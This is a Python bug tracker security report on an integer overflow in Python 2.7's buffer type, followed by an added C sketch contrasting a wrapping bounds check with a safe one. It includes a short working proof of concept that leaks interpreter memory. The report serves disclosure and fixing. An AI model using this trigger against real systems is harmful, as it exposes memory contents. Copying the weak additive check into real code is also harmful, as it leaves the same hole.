New submission from Benjamin Peterson:

Reported by Chris Foster on the security list:

$ ./python 
Python 2.7.7+ (2.7:8e0b7393e921, Jun 24 2014, 03:01:40) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = bytearray('hola mundo')
>>> b = buffer(a, 0x7fffffff, 0x7fffffff)
>>> print repr(b[:0x100])
"\x00\x08\x11\x00\x00\x00\x00\x00\x00\x00\xa00_\xf7\x10\x00\x00\x00i\x03\x00\x00\x02\x00\x00\x00\xa0\xd1\x18\x08I\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00Directory
 tree walk with callback function.\n\n    For each directory in the directory 
tree rooted at top (including top\n    itself, but excluding '.' and '..'), 
call func(arg, dirname, fnames).\n    dirname is the na"

----------
components: Interpreter Core
messages: 221392
nosy: benjamin.peterson
priority: release blocker
severity: normal
status: open
title: integer overflow in 'buffer' type allows reading memory
type: security
versions: Python 2.7

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue21831>
_______________________________________
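
The report does not show where in the interpreter the overflow occurs. The C sketch below is an added example, not CPython's code and not part of the original report. It assumes a 32-bit signed size type and models how a bounds check of the form `offset + size > count` wraps for the values used above, next to a subtraction-based check that cannot wrap. All function names and the clamping logic are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumption: 32-bit signed size type, as on a 32-bit build. */
typedef int32_t ssize32;

/* Two's-complement wraparound add, done through unsigned arithmetic so the
 * model itself has no undefined behaviour. */
static ssize32 wrap_add(ssize32 a, ssize32 b)
{
    return (ssize32)((uint32_t)a + (uint32_t)b);
}

/* Hypothetical weak clamp: returns how many bytes a view (offset, size)
 * over a base object of `count` bytes is allowed to expose. */
static ssize32 view_len_additive(ssize32 count, ssize32 offset, ssize32 size)
{
    if (offset > count)
        offset = count;
    /* For a huge size the sum wraps negative, so the check never fires. */
    if (wrap_add(offset, size) > count)
        size = count - offset;
    return size;
}

/* Hardened clamp: reject negatives, then compare against the remaining
 * space. count - offset cannot overflow because 0 <= offset <= count. */
static ssize32 view_len_checked(ssize32 count, ssize32 offset, ssize32 size)
{
    if (count < 0 || offset < 0 || size < 0)
        return -1;
    if (offset > count)
        offset = count;
    if (size > count - offset)
        size = count - offset;
    return size;
}

int main(void)
{
    /* Values from the report: a 10-byte bytearray, offset and size 0x7fffffff. */
    ssize32 count = 10, off = 0x7fffffff, size = 0x7fffffff;
    printf("additive check exposes %ld bytes\n",
           (long)view_len_additive(count, off, size));
    printf("checked clamp exposes  %ld bytes\n",
           (long)view_len_checked(count, off, size));
    return 0;
}
```

With the additive check the view keeps its full requested length over a 10-byte object, which is the condition under which a slice such as `b[:0x100]` reads past the end of the base buffer.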